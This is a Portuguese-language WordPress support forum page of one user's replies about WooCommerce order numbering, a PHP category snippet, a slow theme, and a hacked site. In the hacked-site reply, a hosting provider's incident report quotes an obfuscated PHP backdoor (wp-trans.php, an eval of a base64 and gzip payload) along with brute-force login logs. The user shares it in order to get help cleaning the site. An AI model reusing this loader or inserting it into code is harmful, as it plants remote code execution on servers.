Respostas no Fórum

Visualizando 7 respostas - 1 até 7 (de um total de 7)
  • Criador do tópico oomaikoo

    (@oomaikoo)

    Bom dia, obrigado pela resposta. Meu wordpress está na versão 5.2.2. Vou fazer o que você sugeriu e seguir monitorando para verificar se some novamente ou não.

    Criador do tópico oomaikoo

    (@oomaikoo)

    A locaweb (empresa que hospedo meus sites) enviou um relatório de possíveis “brechas” no servidor, porém não sei como resolver isso, segue:

    Evidência(s):
    —————————————————
    perl 65411 reporterpilar cwd DIR 253,1 737280 2 /tmp
    perl 65411 reporterpilar rtd DIR 253,0 4096 2 /
    perl 65411 reporterpilar txt REG 253,0 14168 1800300 /usr/bin/perl
    perl 65411 reporterpilar mem REG 253,0 23736 4177941 /lib64/libnss_dns-2.5.so
    perl 65411 reporterpilar mem REG 253,0 53880 4178051 /lib64/libnss_files-2.5.so
    perl 65411 reporterpilar mem REG 253,0 21424 1926701 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/Socket/Socket.so
    perl 65411 reporterpilar mem REG 253,0 18080 1926525 /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi/auto/IO/IO.so
    perl 65411 reporterpilar mem REG 253,0 1720712 4177927 /lib64/libc-2.5.so
    perl 65411 reporterpilar mem REG 253,0 146840 4177951 /lib64/libpthread-2.5.so
    perl 65411 reporterpilar mem REG 253,0 15280 4178103 /lib64/libutil-2.5.so

    bash-3.2$ head wp-trans.php
    <?php $payload=”3ZTLkoIwEEV/CRIZZQlxDG8HVAR2JLF4gzNgeHz9YGG5Zu0ut27Vud2drt67jYMqfxNd7caArI4CN4k1T6D7hltAmuyTJBCoTjGWe6saUgt4PJz0bQj9kSClO49qwzSvP2Y7Tmp7sGqPU81pCFQeBH/zCMu5nXctg0o3vyGpBh5eV2aAtCPATUyYJC9OHwVGq+PFp5WQWIFRvfSvMRbbvXufOX5LDnJ5w35uIgYj4As6TgWmKV/WKD/o9P1gcxYFKadIasOTXBBgj0fgiLTqE+uyW1Uf0VhvXT3OgNQScChWZjTkKhc66jbvPvBzluriQ6PTkThG2aLNjN6PvWBSWE4M+93H9IMPE4VeQ+vLp+xdP7NKkiU1A6xkaFV9OXtykfizbtYDpEgsCGQzQ06jlRkxFnmElL/b+0/U8rkXL38kJ6WjVbjorKnNc+ugWs1J7bUB+KTbsNy6OHC3/w==”;preg_replace(‘/.*/e’,”\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29″,’.’); ?>
    —————————————————

    Identificamos arquivos/diretórios suspeitos:
    —————————————————
    reporterpilar
    -rw-r–r– 1 reporterpilar reporterpilar 875 Jan 6 18:40 wp-cron.php
    -rw-r–r– 1 reporterpilar reporterpilar 747 Jan 6 18:40 wp-trans.php
    -rw-r–r– 1 reporterpilar reporterpilar 894 Jan 6 18:40 cron.php

    public_html
    -rw-r–r– 1 reporterpilar reporterpilar 747 Jan 6 18:41 wp-trans.php
    -rw-r–r– 1 reporterpilar reporterpilar 894 Jan 6 18:41 cron.php
    —————————————————

    Os arquivos citados acima são apenas exemplos localizados numa análise superficial.
    Cabe ao desenvolvedor estar atento às possíveis brechas de segurança existentes e identificar quais arquivos não pertencem ao funcionamento de seu site ou se foram alterados/comprometidos.

    Nos logs HTTP/FTP há acessos que caracterizam exploração de vulnerabilidades em sua aplicação:
    —————————————————
    91.189.120.17 – – [08/Jan/2018:11:26:24 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
    91.189.120.17 – – [08/Jan/2018:11:29:09 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
    91.189.120.17 – – [08/Jan/2018:11:35:58 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
    91.189.120.17 – – [08/Jan/2018:11:38:55 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
    91.189.120.17 – – [08/Jan/2018:11:57:09 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”
    91.189.120.17 – – [08/Jan/2018:12:00:50 -0200] “POST /wp-login.php HTTP/1.1” 500 1090 “-” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36”

    Criador do tópico oomaikoo

    (@oomaikoo)

    Boa tarde, Configurações do PHP OK !
    Fica dificil descobrir se é o plugin ou o tema que está com essa brecha, tem alguma ideia de como descobrir qual exatamente?

    Fórum: Plugins
    Em resposta a: ID de Pedidos Woocomerce
    Criador do tópico oomaikoo

    (@oomaikoo)

    Opa @mariovalney, entendi, agora que eu vi que o Plugin https://br.wordpress.org/plugins/woocommerce-sequential-order-numbers/, funciona, porque lá tinham já no banco 2 pedidos com valores 638 e 639, ai exclui os dois e ele voltou pra “1”, eu estava crente que o Woocomerce puxava o numero do pedido pelo numero do ID salvo no banco de dados, Obrigado pela atenção !

    • Esta resposta foi modificada 7 anos, 1 mês atrás por oomaikoo.
    Fórum: Plugins
    Em resposta a: ID de Pedidos Woocomerce
    Criador do tópico oomaikoo

    (@oomaikoo)

    @mariovalney Obrigado pela sua resposta, eu encontrei esse plugin, porém, na minha instalação do WordPress a tabela Posts já ta com ID numero 639, ou seja, quando eu for mostrar para o cliente a contagem já vai começar alta, a curto prazo é até interessante, mas a longo prazo o numero do pedido vai ficar gigantesco com o tempo.

    Como falei, o ID do meu WP_POSTS já está em 639, queria uma forma de zerar isso sem perder os dados que já tem lá, acho isso uma falha do Woocomerce e da maioria dos plugins, salvar tudo na tabela WP_POSTS.

    Poderia ser também, criar para os posts do tipo pedido uma nova coluna com ID’s começando do zero, será que isso é possível?

    Olha como está o WP_POSTS, ta tudo bagunçando, tem uns 40 registros apenas mas os IDS já vao em 400, porque ele não ta seguindo uma sequênciaBacno

    • Esta resposta foi modificada 7 anos, 1 mês atrás por oomaikoo.
    • Esta resposta foi modificada 7 anos, 1 mês atrás por oomaikoo.
    Fórum: Plugins
    Em resposta a: Listagem de subcategorias

    Essa função que eu uso no meu Blog puxa a ultima notícia de determinada Gategoria

    <?php query_posts ("category_name=NOMEDACATEGORIA&showposts=1"); $slug = get_post( $post )->post_name;?>
    <?php if (have_posts()) : ?>
    <?php while (have_posts()) : the_post(); ?>
    <h5><a style="text-decoration:none;" href="http://SEUSITE/category/<?php foreach(get_the_category() as $category) {echo $category->slug . '';} ?>"><?php the_title(); ?></a></h5>
    <?php endwhile; ?>
    <?php endif; ?>
    <?php wp_reset_query(); ?>

    Ela escreve o ultimo post da categoria e linka. ali no showposts=1 é só alterar o numero para puxar mais de uma categoria

    espero que te ajude 😉

    Criador do tópico oomaikoo

    (@oomaikoo)

    Obrigado pelas informações raldenesouza criei um tópico no suporte do Tema em relação ao problema do album lá que quando passa o mouse em cima ele pisca a tela, em relação aos Banners de Download que aparece é porque estou usando uma hospedagem FREE só para a criação e Teste, mas depois vou transferi-lo para uma hospedagem paga, realmente o Site está PESADO mas foi o meu Cliente que pegou que eu fizesse o site assim com imagens pesadas etc, o publico alvo é realmente quem tem poder aquisitivo mais elevado, com internet melhor então não é problema o tempo de carregamento, eu uso o Plugin Huge IT Gallery para o Slide dos Projetos, vou procurar outro Plugin e vê se continua o mesmo problema no Google Chrome, mais uma vez Obrigado pela ajuda e retorno com a resolução do problema (caso eu consiga resolver é claro kk) Boa tarde.

Visualizando 7 respostas - 1 até 7 (de um total de 7)